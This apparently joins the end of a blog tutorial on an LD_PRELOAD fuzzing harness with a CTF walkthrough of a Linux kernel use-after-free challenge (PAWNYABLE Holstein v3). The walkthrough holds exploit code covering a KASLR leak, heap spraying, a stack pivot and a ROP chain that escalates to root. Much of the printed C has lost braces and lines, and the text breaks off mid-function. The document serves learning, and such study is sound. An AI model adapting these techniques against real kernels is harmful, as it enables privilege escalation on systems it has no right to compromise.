Now we can flesh out our __fxstat() hook with some logic. The caller is hoping to retrieve a stat struct from the function for our fuzzing target fuzzme by passing the special file descriptor 1337. Luckily, we have our global stat struct that we can return after we update its size to match that of the current input in memory (as tracked by us and the fuzzer as the value at INPUT_SIZE_ADDR). So if called, we simply update our stat struct size, and memcpy our struct into their *__stat_buf. Our complete hook now looks like this:

// Hook for __fxstat
int __fxstat (int __ver, int __filedesc, struct stat *__stat_buf) {
    // Resolve the real fxstat
    if (NULL == real_fxstat) {
        real_fxstat = _resolve_symbol("__fxstat");

    int ret = -1;

    // Check to see if we're stat'ing our fuzz target
    if (1337 == __filedesc) {
        // Patch the global struct with current input size
        st.st_size = *(size_t*)INPUT_SZ_ADDR;

        // Copy global stat struct back to caller
        memcpy(__stat_buf, &st, sizeof(struct stat));
        ret = 0;

    // Normal stat, send to real fxstat
    else {
        ret = real_fxstat(__ver, __filedesc, __stat_buf);

    return ret;

Now if we run this, we actually don’t break and objdump is able exit cleanly under strace.

Wrapping Up

To test whether or not we have done a fair job, we will go ahead and output objdump -D fuzzme to a file, and then we’ll go ahead and output the same command but with our harness shared object loaded. Lastly, we’ll run objdump -D /bin/ed and output to a file to see if our harness created the same output.

h0mbre@ubuntu:~/blogpost$ objdump -D fuzzme > /tmp/fuzzme_original.txt      
h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme > /tmp/harness.txt 
h0mbre@ubuntu:~/blogpost$ objdump -D /bin/ed > /tmp/ed.txt

Then we sha1sum the files:

h0mbre@ubuntu:~/blogpost$ sha1sum /tmp/fuzzme_original.txt /tmp/harness.txt /tmp/ed.txt 
938518c86301ab00ddf6a3ef528d7610fa3fd05a  /tmp/fuzzme_original.txt
add4e6c3c298733f48fbfe143caee79445c2f196  /tmp/harness.txt
10454308b672022b40f6ce5e32a6217612b462c8  /tmp/ed.txt

We actually get three different hashes, we wanted the harness and /bin/ed to output the same output since /bin/ed is the input we loaded into memory.

h0mbre@ubuntu:~/blogpost$ ls -laht /tmp
total 14M
drwxrwxrwt 28 root   root   128K Apr  3 08:44 .
-rw-rw-r--  1 h0mbre h0mbre 736K Apr  3 08:43 ed.txt
-rw-rw-r--  1 h0mbre h0mbre 736K Apr  3 08:43 harness.txt
-rw-rw-r--  1 h0mbre h0mbre 2.2M Apr  3 08:42 fuzzme_original.txt

Ah, they are the same length at least, that must mean there is a subtle difference and diff shows us why the hashes aren’t the same:

h0mbre@ubuntu:~/blogpost$ diff /tmp/ed.txt /tmp/harness.txt 
< /bin/ed:     file format elf64-x86-64
> fuzzme:     file format elf64-x86-64

The name of the file in the argv[] array is different, so that’s the only difference. In the end we were able to feed objdump an input file, but have it actually take input from an in-memory buffer in our harness.

One more thing, we actually forgot that objdump closes our file didn’t we! So I went ahead and added a quick fclose() hook. We wouldn’t have any problems if fclose() just wanted to free the heap memory associated with our fmemopen() returned FILE *; however, it would also probably try to call close() on that wonky file descriptor as well and we don’t want that. It might not even matter in the end, just want to be safe. Up to the reader to experiment and see what changes. The imaginary fuzzer should restore FILE * heap memory anyways during its snapshot restoration routine.


There are a million different ways to accomplish this goal, I just wanted to walk you through my thought process. There are actually a lot of cool things you can do with this harness, one thing I’ve done is actually hook malloc() to fail on large allocations so that I don’t waste fuzzing cycles on things that will eventually timeout. You can also create an at_exit() choke point so that no matter what, the program executes your at_exit() function every time it is exiting which can be useful for snapshot resets if the program can take multiple exit paths as you only have to cover the one exit point.

Hopefully this was useful to some! The complete code to the harness is below, happy fuzzing!

Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl

#define _GNU_SOURCE     /* dlsym */
#include <stdio.h> /* printf */
#include <sys/stat.h> /* stat */
#include <stdlib.h> /* exit */
#include <unistd.h> /* __xstat, __fxstat */
#include <dlfcn.h> /* dlsym and friends */
#include <sys/mman.h> /* mmap */
#include <string.h> /* memset */
#include <fcntl.h> /* open */

// Filename of the input file we're trying to emulate
#define FUZZ_TARGET     "fuzzme"

// Definitions for our in-memory inputs 
#define INPUT_SZ_ADDR   0x1336000
#define INPUT_ADDR      0x1337000
#define MAX_INPUT_SZ    (1024 * 1024)

// For testing purposes, we read /bin/ed into our input buffer to simulate
// what the fuzzer would do
#define  TEST_FILE      "/bin/ed"

// Our "legit" global stat struct
struct stat st;

// FILE * returned to callers of fopen64() 
FILE *faked_fp = NULL;

// Declare a prototype for the real stat as a function pointer
typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
__xstat_t real_xstat = NULL;

// Declare prototype for the real fopen and its friend fopen64 
typedef FILE* (*fopen_t)(const char* pathname, const char* mode);
fopen_t real_fopen = NULL;

typedef FILE* (*fopen64_t)(const char* pathname, const char* mode);
fopen64_t real_fopen64 = NULL;

// Declare prototype for the real __fxstat
typedef int (*__fxstat_t)(int __ver, int __filedesc, struct stat *__stat_buf);
__fxstat_t real_fxstat = NULL;

// Declare prototype for the real __fcntl
typedef int (*fcntl_t)(int fildes, int cmd, ...);
fcntl_t real_fcntl = NULL;

// Returns memory address of *next* location of symbol in library search order
static void *_resolve_symbol(const char *symbol) {
    // Clear previous errors

    // Get symbol address
    void* addr = dlsym(RTLD_NEXT, symbol);

    // Check for error
    char* err = NULL;
    err = dlerror();
    if (err) {
        addr = NULL;
        printf("** Err resolving '%s' addr: %s\n", symbol, err);
    return addr;

// Hook for __xstat 
int __xstat(int __ver, const char* __filename, struct stat* __stat_buf) {
    // Resolve the real __xstat() on demand and maybe multiple times!
    if (!real_xstat) {
        real_xstat = _resolve_symbol("__xstat");

    // Assume the worst, always
    int ret = -1;

    // Special __ver value check to see if we're calling from constructor
    if (0x1337 == __ver) {
        // Patch back up the version value before sending to real xstat
        __ver = 1;

        ret = real_xstat(__ver, __filename, __stat_buf);

        // Set the real_xstat back to NULL
        real_xstat = NULL;
        return ret;

    // Determine if we're stat'ing our fuzzing target
    if (!strcmp(__filename, FUZZ_TARGET)) {
        // Update our global stat struct
        st.st_size = *(size_t *)INPUT_SZ_ADDR;

        // Send it back to the caller, skip syscall
        memcpy(__stat_buf, &st, sizeof(struct stat));
        ret = 0;

    // Just a normal stat, send to real xstat
    else {
        ret = real_xstat(__ver, __filename, __stat_buf);

    return ret;

// Exploratory hooks to see if we're using fopen() related functions to open
// our input file
FILE* fopen(const char* pathname, const char* mode) {
    printf("** fopen() called for '%s'\n", pathname);

// Our fopen hook, return a FILE* to the caller, also, if we are opening our
// target make sure we're not able to write to the file
FILE* fopen64(const char* pathname, const char* mode) {
    // Resolve symbol on demand and only once
    if (NULL == real_fopen64) {
        real_fopen64 = _resolve_symbol("fopen64");

    // Check to see what file we're opening
    FILE* ret = NULL;
    if (!strcmp(FUZZ_TARGET, pathname)) {
        // We're trying to open our file, make sure it's a read-only mode
        if (strcmp(mode, "r")) {
            printf("** Attempt to open fuzz-target in illegal mode: '%s'\n", mode);

        // Open shared memory FILE* and return to caller
        ret = fmemopen((void*)INPUT_ADDR, *(size_t*)INPUT_SZ_ADDR, mode);
        // Make sure we've never fopen()'d our fuzzing target before
        if (faked_fp) {
            printf("** Attempting to fopen64() fuzzing target more than once\n");

        // Update faked_fp
        faked_fp = ret;

        // Change the filedes to something we know
        ret->_fileno = 1337;

    // We're not opening our file, send to regular fopen
    else {
        ret = real_fopen64(pathname, mode);

    // Return FILE stream ptr to caller
    return ret;

// Hook for __fxstat
int __fxstat (int __ver, int __filedesc, struct stat *__stat_buf) {
    // Resolve the real fxstat
    if (NULL == real_fxstat) {
        real_fxstat = _resolve_symbol("__fxstat");

    int ret = -1;

    // Check to see if we're stat'ing our fuzz target
    if (1337 == __filedesc) {
        // Patch the global struct with current input size
        st.st_size = *(size_t*)INPUT_SZ_ADDR;

        // Copy global stat struct back to caller
        memcpy(__stat_buf, &st, sizeof(struct stat));
        ret = 0;

    // Normal stat, send to real fxstat
    else {
        ret = real_fxstat(__ver, __filedesc, __stat_buf);

    return ret;

// Hook for fcntl
int fcntl(int fildes, int cmd, ...) {
    // Resolve fcntl symbol if needed
    if (NULL == real_fcntl) {
        real_fcntl = _resolve_symbol("fcntl");

    if (fildes == 1337) {
        return O_RDONLY;

    else {
        printf("** fcntl() called for real file descriptor\n");

// Map memory to hold our inputs in memory and information about their size
static void _create_mem_mappings(void) {
    void *result = NULL;

    // Map the page to hold the input size
    result = mmap(
        (void *)(INPUT_SZ_ADDR),
    if ((MAP_FAILED == result) || (result != (void *)INPUT_SZ_ADDR)) {
        printf("** Err mapping INPUT_SZ_ADDR, mapped @ %p\n", result);

    // Let's actually initialize the value at the input size location as well
    *(size_t *)INPUT_SZ_ADDR = 0;

    // Map the pages to hold the input contents
    result = mmap(
        (void *)(INPUT_ADDR),
    if ((MAP_FAILED == result) || (result != (void *)INPUT_ADDR)) {
        printf("** Err mapping INPUT_ADDR, mapped @ %p\n", result);

    // Init the value
    memset((void *)INPUT_ADDR, 0, (size_t)MAX_INPUT_SZ);

// Create a "legit" stat struct globally to pass to callers
static void _setup_stat_struct(void) {
    int result = __xstat(0x1337, FUZZ_TARGET, &st);
    if (-1 == result) {
        printf("** Err creating stat struct for '%s' during load\n", FUZZ_TARGET);

// Used for testing, load /bin/ed into the input buffer and update its size info
#ifdef TEST
static void _test_func(void) {    
    // Open TEST_FILE for reading
    int fd = open(TEST_FILE, O_RDONLY);
    if (-1 == fd) {
        printf("** Failed to open '%s' during test\n", TEST_FILE);

    // Attempt to read max input buf size
    ssize_t bytes = read(fd, (void*)INPUT_ADDR, (size_t)MAX_INPUT_SZ);

    // Update the input size
    *(size_t *)INPUT_SZ_ADDR = (size_t)bytes;

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    // Create memory mappings to hold our input and information about its size

    // Setup global "legit" stat struct

    // If we're testing, load /bin/ed up into our input buffer and update size
#ifdef TEST

PAWNYABLE UAF Walkthrough (Holstein v3)

By: h0mbre
29 October 2022 at 04:00


I’ve been wanting to learn Linux Kernel exploitation for some time and a couple months ago @ptrYudai from @zer0pts tweeted that they released the beta version of their website PAWNYABLE!, which is a β€œresource for middle to advanced learners to study Binary Exploitation”. The first section on the website with material already ready is β€œLinux Kernel”, so this was a perfect place to start learning.

The author does a great job explaining everything you need to know to get started, things like: setting up a debugging environment, CTF-specific tips, modern kernel exploitation mitigations, using QEMU, manipulating images, per-CPU slab caches, etc, so this blogpost will focus exclusively on my experience with the challenge and the way I decided to solve it. I’m going to try and limit redundant information within this blogpost so if you have any questions, it’s best to consult PAWNYABLE and the other linked resources.

What I Started With

PAWNYABLE ended up being a great way for me to start learning about Linux Kernel exploitation, mainly because I didn’t have to spend any time getting up to speed on a kernel subsystem in order to start wading into the exploitation metagame. For instance, if you are the type of person who learns by doing, and you’re first attempt at learning about this stuff was to write your own exploit for CVE-2022-32250, you would first have to spend a considerable amount of time learning about Netfilter. Instead, PAWNYABLE gives you a straightforward example of a vulnerability in one of a handful of bug-classes, and then gets to work showing you how you could exploit it. I think this strategy is great for beginners like me. It’s worth noting that after having spent some time with PAWNYABLE, I have been able to write some exploits for real world bugs similar to CVE-2022-32250, so my strategy did prove to be fruitful (at least for me).

I’ve been doing low-level binary stuff (mostly on Linux) for the past 3 years. Initially I was very interested in learning binary exploitation but starting gravitating towards vulnerability discovery and fuzzing. Fuzzing has captivated me since early 2020, and developing my own fuzzing frameworks actually lead to me working as a full time software developer for the last couple of years. So after going pretty deep with fuzzing (objectively not that deep as it relates to the entire fuzzing space, but deep for the uninitiated) , I wanted to circle back and learn at least some aspect of binary exploitation that applied to modern targets.

The Linux Kernel, as a target, seemed like a happy marriage between multiple things: it’s relatively easy to write exploits for due to a lack of mitigations, exploitable bugs and their resulting exploits have a wide and high impact, and there are active bounty systems/programs for Linux Kernel exploits. As a quick side-note, there have been some tremendous strides made in the world of Linux Kernel fuzzing in the last few years so I knew that specializing in this space would allow me to get up to speed on those approaches/tools.

So coming into this, I had a pretty good foundation of basic binary exploitation (mostly dated Windows and Linux userland stuff), a few years of C development (to include a few Linux Kernel modules), and some reverse engineering skills.

What I Did

To get started, I read through the following PAWNYABLE sections (section names have been Google translated to English):

  • Introduction to kernel exploits
  • kernel debugging with gdb
  • security mechanism (Overview of Exploitation Mitigations)
  • Compile and transfer exploits (working with the kernel image)

This was great as a starting point because everything is so well organized you don’t have to spend time setting up your environment, its basically just copy pasting a few commands and you’re off and remotely debugging a kernel via GDB (with GEF even).

Next, I started working on the first challenge which is a stack-based buffer overflow vulnerability in Holstein v1. This is a great starting place because right away you get control of the instruction pointer and from there, you’re learning about things like the way CTF players (and security researchers) often leverage kernel code execution to escalate privileges like prepare_kernel_creds and commit_creds.

You can write an exploit that bypasses mitigations or not, it’s up to you. I started slowly and wrote an exploit with no mitigations enabled, then slowly turned the mitigations up and changed the exploit as needed.

After that, I started working on a popular Linux kernel pwn challenge called β€œkernel-rop” from hxpCTF 2020. I followed along and worked alongside the following blogposts from @_lkmidas:

This was great because it gave me a chance to reinforce everything I had learned from the PAWNYABLE stack buffer overflow challenge and also I learned a few new things. I also used (https://0x434b.dev/dabbling-with-linux-kernel-exploitation-ctf-challenges-to-learn-the-ropes/) to supplement some of the information.

As a bonus, I also wrote a version of the exploit that utilized a different technique to elevate privileges: overwriting modprobe_path.

After all this, I felt like I had a good enough base to get started on the UAF challenge.

UAF Challenge: Holstein v3

Some quick vulnerability analysis on the vulnerable driver provided by the author states the problem clearly.

char *g_buf = NULL;

static int module_open(struct inode *inode, struct file *file)
  printk(KERN_INFO "module_open called\n");

  g_buf = kzalloc(BUFFER_SIZE, GFP_KERNEL);
  if (!g_buf) {
    printk(KERN_INFO "kmalloc failed");
    return -ENOMEM;

  return 0;

When we open the kernel driver, char *g_buf gets assigned the result of a call to kzalloc().

static int module_close(struct inode *inode, struct file *file)
  printk(KERN_INFO "module_close called\n");
  return 0;

When we close the kernel driver, g_buf is freed. As the author explains, this is a buggy code pattern since we can open multiple handles to the driver from within our program. Something like this can occur.

  1. We’ve done nothing, g_buf = NULL
  2. We’ve opened the driver, g_buf = 0xffff...a0, and we have fd1 in our program
  3. We’ve opened the driver a second time, g_buf = 0xffff...b0 . The original value of 0xffff...a0 has been overwritten. It can no longer be freed and would cause a memory leak (not super important). We now have fd2 in our program
  4. We close fd1 which calls kfree() on 0xffff...b0 and frees the same pointer we have a reference to with fd2.

At this point, via our access to fd2, we have a use after free since we can still potentially use a freed reference to g_buf. The module also allows us to use the open file descriptor with read and write methods.

static ssize_t module_read(struct file *file,
                           char __user *buf, size_t count,
                           loff_t *f_pos)
  printk(KERN_INFO "module_read called\n");

  if (count > BUFFER_SIZE) {
    printk(KERN_INFO "invalid buffer size\n");
    return -EINVAL;

  if (copy_to_user(buf, g_buf, count)) {
    printk(KERN_INFO "copy_to_user failed\n");
    return -EINVAL;

  return count;

static ssize_t module_write(struct file *file,
                            const char __user *buf, size_t count,
                            loff_t *f_pos)
  printk(KERN_INFO "module_write called\n");

  if (count > BUFFER_SIZE) {
    printk(KERN_INFO "invalid buffer size\n");
    return -EINVAL;

  if (copy_from_user(g_buf, buf, count)) {
    printk(KERN_INFO "copy_from_user failed\n");
    return -EINVAL;

  return count;

So with these methods, we are able to read and write to our freed object. This is great for us since we’re free to pretty much do anything we want. We are limited somewhat by the object size which is hardcoded in the code to 0x400.

At a high-level, UAFs are generally exploited by creating the UAF condition, so we have a reference to a freed object within our control, and then we want to cause the allocation of a different object to fill the space that was previously filled by our freed object.

So if we allocated a g_buf of size 0x400 and then freed it, we need to place another object in its place. This new object would then be the target of our reads and writes.

KASLR Bypass

The first thing we need to do is bypass KASLR by leaking some address that is a known static offset from the kernel image base. I started searching for objects that have leakable members and again, @ptrYudai came to the rescue with a catalog on useful Linux Kernel data structures for exploitation. This lead me to the tty_struct which is allocated on the same slab cache as our 0x400 buffer, the kmalloc-1024. The tty_struct has a field called tty_operations which is a pointer to a function table that is a static offset from the kernel base. So if we can leak the address of tty_operations we will have bypassed KASLR. This struct was used by NCCGROUP for the same purpose in their exploit of CVE-2022-32250.

It’s important to note that slab cache that we’re targeting is per-CPU. Luckily, the VM we’re given for the challenge only has one logical core so we don’t have to worry about CPU affinity for this exercise. On most systems with more than one core, we would have to worry about influencing one specific CPU’s cache.

So with our module_read ability, we will simply:

  1. Free g_buf
  2. Create dev_tty structs until one hopefully fills the freed space where g_buf used to live
  3. Call module_read to get a copy of the g_buf which is now actually our dev_tty and then inspect the value of tty_struct->tty_operations.

Here are some snippets of code related to that from the exploit:

// Leak a tty_struct->ops field which is constant offset from kernel base
uint64_t leak_ops(int fd) {
    if (fd < 0) {
        err("Bad fd given to `leak_ops()`");

    /* tty_struct {
        int magic;      // 4 bytes
        struct kref;    // 4 bytes (single member is an int refcount_t)
        struct device *dev; // 8 bytes
        struct tty_driver *driver; // 8 bytes
        const struct tty_operations *ops; (offset 24 (or 0x18))
    } */

    // Read first 32 bytes of the structure
    unsigned char *ops_buf = calloc(1, 32);
    if (!ops_buf) {
        err("Failed to allocate ops_buf");

    ssize_t bytes_read = read(fd, ops_buf, 32);
    if (bytes_read != (ssize_t)32) {
        err("Failed to read enough bytes from fd: %d", fd);

    uint64_t ops = *(uint64_t *)&ops_buf[24];
    info("tty_struct->ops: 0x%lx", ops);

    // Solve for kernel base, keep the last 12 bits
    uint64_t test = ops & 0b111111111111;

    // These magic compares are for static offsets on this kernel
    if (test == 0xb40ULL) {
        return ops - 0xc39b40ULL;

    else if (test == 0xc60ULL) {
        return ops - 0xc39c60ULL;

    else {
        err("Got an unexpected tty_struct->ops ptr");

There’s a confusing part about ANDing off the lower 12 bits of the leaked value and that’s because I kept getting one of two values during multiple runs of the exploit within the same boot. This is probably because there’s two kinds of tty_structs that can be allocated and they are allocated in pairs. This if else if block just handles both cases and solves the kernel base for us. So at this point we have bypassed KASLR because we know the base address the kernel is loaded at.

RIP Control

Next, we need someway to high-jack execution. Luckily, we can use the same data structure, tty_struct as we can write to the object using module_write and we can overwrite the pointer value for tty_struct->ops.

struct tty_operations is a table of function pointers, and looks like this:

struct tty_struct * (*lookup)(struct tty_driver *driver,
			struct file *filp, int idx);
	int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
	void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
	int  (*open)(struct tty_struct * tty, struct file * filp);
	void (*close)(struct tty_struct * tty, struct file * filp);
	void (*shutdown)(struct tty_struct *tty);
	void (*cleanup)(struct tty_struct *tty);
	int  (*write)(struct tty_struct * tty,
		      const unsigned char *buf, int count);
	int  (*put_char)(struct tty_struct *tty, unsigned char ch);
	void (*flush_chars)(struct tty_struct *tty);
	unsigned int (*write_room)(struct tty_struct *tty);
	unsigned int (*chars_in_buffer)(struct tty_struct *tty);
	int  (*ioctl)(struct tty_struct *tty,
		    unsigned int cmd, unsigned long arg);

These functions are invoked on the tty_struct when certain actions are performed on an instance of a tty_struct. For example, when the tty_struct’s controlling process exits, several of these functions are called in a row: close(), shutdown(), and cleanup().

So our plan, will be to:

  1. Create UAF condition
  2. Occupy free’d memory with tty_struct
  3. Read a copy of the tty_struct back to us in userland
  4. Alter the tty->ops value to point to a faked function table that we control
  5. Write the new data back to the tty_struct which is now corrupted
  6. Do something to the tty_struct that causes a function we control to be invoked

PAWNYABLE tells us that a popular target is invoking ioctl() as the function takes several arguments which are user-controlled.

int  (*ioctl)(struct tty_struct *tty,
		    unsigned int cmd, unsigned long arg);

From userland, we can supply the values for cmd and arg. This gives us some flexibility. The value we can provide for cmd is somewhat limited as an unsigned int is only 4 bytes. arg gives us a full 8 bytes of control over RDX. Since we can control the contents of RDX whenever we invoke ioctl(), we need to find a gadget to pivot the stack to some code in the kernel heap that we can control. I found such a gadget here:

0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret;

We will push a value from RDX onto the stack, and then later pop that value into RSP. When ioctl() returns, we will return to whatever value we called ioctl() with in arg. So the control flow will go something like:

  1. Invoke ioctl() on our corrupted tty_struct
  2. ioctl() has been overwritten by a stack-pivot gadget that places the location of our ROP chain into RSP
  3. ioctl() returns execution to our ROP chain

So now we have a new problem, how do we create a fake function table and ROP chain in the kernel heap AND figure out where we stored them?

Creating/Locating a ROP Chain and Fake Function Table

This is where I started to diverge from the author’s exploitation strategy. I couldn’t quite follow along with the intended solution for this problem, so I began searching for other ways. With our extremely powerful read capability in mind, I remembered the msg_msg struct from @ptrYudai’s aforementioned structure catalog, and realized that the structure was perfect for our purposes as it:

  • Stores arbitrary data inline in the structure body (not via a pointer to the heap)
  • Contains a linked-list member that contains the addresses to prev and next messages within the same kernel message queue

So quickly, a strategy began to form. We could:

  1. Create our ROP chain and Fake Function table in a buffe
  2. Send the buffer as the body of a msg_msg struct
  3. Use our module_read capability to read the msg_msg->list.next and msg_msg->list.prev values to know where in the heap at least two of our messages were stored

With this ability, we would know exactly what address to supply as an argument to ioctl() when we invoke it in order to pivot the stack into our ROP chain. Here is some code related to that from the exploit:

// Allocate one msg_msg on the heap
size_t send_message() {
    // Calcuate current queue
    if (num_queue < 1) {
        err("`send_message()` called with no message queues");
    int curr_q = msg_queue[num_queue - 1];

    // Send message
    size_t fails = 0;
    struct msgbuf {
        long mtype;
        char mtext[MSG_SZ];
    } msg;

    // Unique identifier we can use
    msg.mtype = 0x1337;

    // Construct the ROP chain
    memset(msg.mtext, 0, MSG_SZ);

    // Pattern for offsets (debugging)
    uint64_t base = 0x41;
    uint64_t *curr = (uint64_t *)&msg.mtext[0];
    for (size_t i = 0; i < 25; i++) {
        uint64_t fill = base << 56;
        fill |= base << 48;
        fill |= base << 40;
        fill |= base << 32;
        fill |= base << 24;
        fill |= base << 16;
        fill |= base << 8;
        fill |= base;
        *curr++ = fill;

    // ROP chain
    uint64_t *rop = (uint64_t *)&msg.mtext[0];
    *rop++ = pop_rdi; 
    *rop++ = 0x0;
    *rop++ = prepare_kernel_cred; // RAX now holds ptr to new creds
    *rop++ = xchg_rdi_rax; // Place creds into RDI 
    *rop++ = commit_creds; // Now we have super powers
    *rop++ = kpti_tramp;
    *rop++ = 0x0; // pop rax inside kpti_tramp
    *rop++ = 0x0; // pop rdi inside kpti_tramp
    *rop++ = (uint64_t)pop_shell; // Return here
    *rop++ = user_cs;
    *rop++ = user_rflags;
    *rop++ = user_sp;
    *rop   = user_ss;

    /* struct tty_operations {
        struct tty_struct * (*lookup)(struct tty_driver *driver,
                struct file *filp, int idx);
        int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
        void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
        int  (*open)(struct tty_struct * tty, struct file * filp);
        void (*close)(struct tty_struct * tty, struct file * filp);
        void (*shutdown)(struct tty_struct *tty);
        void (*cleanup)(struct tty_struct *tty);
        int  (*write)(struct tty_struct * tty,
                const unsigned char *buf, int count);
        int  (*put_char)(struct tty_struct *tty, unsigned char ch);
        void (*flush_chars)(struct tty_struct *tty);
        unsigned int (*write_room)(struct tty_struct *tty);
        unsigned int (*chars_in_buffer)(struct tty_struct *tty);
        int  (*ioctl)(struct tty_struct *tty,
                unsigned int cmd, unsigned long arg);
    } */

    // Populate the 12 function pointers in the table that we have created.
    // There are 3 handlers that are invoked for allocated tty_structs when 
    // their controlling process exits, they are close(), shutdown(),
    // and cleanup(). We have to overwrite these pointers for when we exit our
    // exploit process or else the kernel will panic with a RIP of 
    // 0xdeadbeefdeadbeef. We overwrite them with a simple ret gadget
    uint64_t *func_table = (uint64_t *)&msg.mtext[rop_len];
    for (size_t i = 0; i < 12; i++) {
        // If i == 4, we're on the close() handler, set to ret gadget
        if (i == 4) { *func_table++ = ret; continue; }

        // If i == 5, we're on the shutdown() handler, set to ret gadget
        if (i == 5) { *func_table++ = ret; continue; }

        // If i == 6, we're on the cleanup() handler, set to ret gadget
        if (i == 6) { *func_table++ = ret; continue; }

        // Magic value for debugging
        *func_table++ = 0xdeadbeefdeadbe00 + i;

    // Put our gadget address as the ioctl() handler to pivot stack
    *func_table = push_rdx;

    // Spray msg_msg's on the heap
    if (msgsnd(curr_q, &msg, MSG_SZ, IPC_NOWAIT) == -1) {

    return fails;

I got a bit wordy with the comments in this block, but it’s for good reason. I didn’t want the exploit to ruin the kernel state, I wanted to exit cleanly. This presented a problem as we are completely hi-jacking the ops function table which the kernel will use to cleanup our tty_struct. So I found a gadget that simply performs a ret operation, and overwrote the function pointers for close(), shutdown(), and cleanup() so that when they are invoked, they simply return and the kernel is apparently fine with this and doesn’t panic.

So our message body looks something like: <β€”-ROPβ€”-Faked Function Tableβ€”->

Here is the code I used to overwrite the tty_struct->ops pointer:

void overwrite_ops(int fd) {
    unsigned char g_buf[GBUF_SZ] = { 0 };
    ssize_t bytes_read = read(fd, g_buf, GBUF_SZ);
    if (bytes_read != (ssize_t)GBUF_SZ) {
        err("Failed to read enough bytes from fd: %d", fd);

    // Overwrite the tty_struct->ops pointer with ROP address
    *(uint64_t *)&g_buf[24] = fake_table;
    ssize_t bytes_written = write(fd, g_buf, GBUF_SZ);
    if (bytes_written != (ssize_t)GBUF_SZ) {
        err("Failed to write enough bytes to fd: %d", fd);

So now that we know where our ROP chain is, and where our faked function table is, and we have the perfect stack pivot gadget, the rest of this process is simply building a real ROP chain which I will leave out of this post.

As a first timer, this tiny bit of creativity to leverage the read ability to leak the addresses of msg_msg structs was enough to get me hooked. Here is a picture of the exploit in action:


There were some things I tried to do to increase the exploit’s reliability.

One was to check the magic value in the leaked tty_structs to make sure a tty_struct had actually filled our freed memory and not another object. This is extremely convenient! All tty_structs have 0x5401 at tty->magic.

Another thing I did was spray msg_msg structs with an easily recognizable message type of 0x1337. This way when leaked, I could easily verify I was in fact leaking msg_msg contents and not some other arbitrary data structure. Another thing you could do would be to make sure supposed kernel addresses start with 0xffff.

Finally, there was the patching of the clean-up-related function pointers in tty->ops.

Further Reading

There are lots of challenges besides the UAF one on PAWNYABLE, please go check them out. One of the primary reasons I wrote this was to get the author’s project more visitors and beneficiaries. It has made a big difference for me and in the almost month since I finished this challenge, I have learned a ton. Special thanks to @chompie1337 for letting me complain and giving me helpful advice/resources.

Some awesome blogposts I read throughout the learning process up to this point include:

  • https://www.graplsecurity.com/post/iou-ring-exploiting-the-linux-kernel
  • https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html
  • https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/
  • https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html

Exploit Code

// One liner to add exploit to filesystem
// gcc exploit.c -o exploit -static && cp exploit rootfs && cd rootfs && find . -print0 | cpio -o --format=newc --null --owner=root > ../rootfs.cpio && cd ../

#include <stdio.h> /* printf */
#include <sys/types.h> /* open */
#include <sys/stat.h> /* open */
#include <fcntl.h> /* open */
#include <stdlib.h> /* exit */
#include <stdint.h> /* int_t's */
#include <unistd.h> /* getuid */
#include <string.h> /* memset */
#include <sys/ipc.h> /* msg_msg */ 
#include <sys/msg.h> /* msg_msg */
#include <sys/ioctl.h> /* ioctl */
#include <stdarg.h> /* va_args */
#include <stdbool.h> /* true, false */ 

#define DEV "/dev/holstein"
#define PTMX "/dev/ptmx"

#define PTMX_SPRAY (size_t)50       // Number of terminals to allocate
#define MSG_SPRAY (size_t)32        // Number of msg_msg's per queue
#define NUM_QUEUE (size_t)4         // Number of msg queues
#define MSG_SZ (size_t)512          // Size of each msg_msg, modulo 8 == 0
#define GBUF_SZ (size_t)0x400       // Size of g_buf in driver

// User state globals
uint64_t user_cs;
uint64_t user_ss;
uint64_t user_rflags;
uint64_t user_sp;

// Mutable globals, when in Rome
uint64_t base;
uint64_t rop_addr;
uint64_t fake_table;
uint64_t ioctl_ptr;
int open_ptmx[PTMX_SPRAY] = { 0 };          // Store fds for clean up/ioctl()
int num_ptmx = 0;                           // Number of open fds
int msg_queue[NUM_QUEUE] = { 0 };           // Initialized message queues
int num_queue = 0;

// Misc constants. 
const uint64_t rop_len = 200;
const uint64_t ioctl_off = 12 * sizeof(uint64_t);

// Gadgets
// 0x723c0: commit_creds
uint64_t commit_creds;
// 0x72560: prepare_kernel_cred
uint64_t prepare_kernel_cred;
// 0x800e10: swapgs_restore_regs_and_return_to_usermode
uint64_t kpti_tramp;
// 0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret; (stack pivot)
uint64_t push_rdx;
// 0x35738d: pop rdi; ret;
uint64_t pop_rdi;
// 0x487980: xchg rdi, rax; sar bh, 0x89; ret;
uint64_t xchg_rdi_rax;
// 0x32afea: ret;
uint64_t ret;

void err(const char* format, ...) {
    if (!format) {

    fprintf(stderr, "%s", "[!] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    fprintf(stderr, "%s", "\n");

void info(const char* format, ...) {
    if (!format) {
    fprintf(stderr, "%s", "[*] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    fprintf(stderr, "%s", "\n");

void save_state(void) {
        ".intel_syntax noprefix;"   
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        // Push CPU flags onto stack
        // Pop CPU flags into var
        "pop user_rflags;"

// Should spawn a root shell
void pop_shell(void) {
    uid_t uid = getuid();
    if (uid != 0) {
        err("We are not root, wtf?");

    info("We got root, spawning shell!");

// Open a char device, just exit on error, this is exploit code
int open_device(char *dev, int flags) {
    int fd = -1;
    if (!dev) {
        err("NULL ptr given to `open_device()`");

    fd = open(dev, flags);
    if (fd < 0) {
        err("Failed to open '%s'", dev);

    return fd;

// Spray kmalloc-1024 sized '/dev/ptmx' structures on the kernel heap
void alloc_ptmx() {
    int fd = open("/dev/ptmx", O_RDONLY | O_NOCTTY);
    if (fd < 0) {
        err("Failed to open /dev/ptmx");

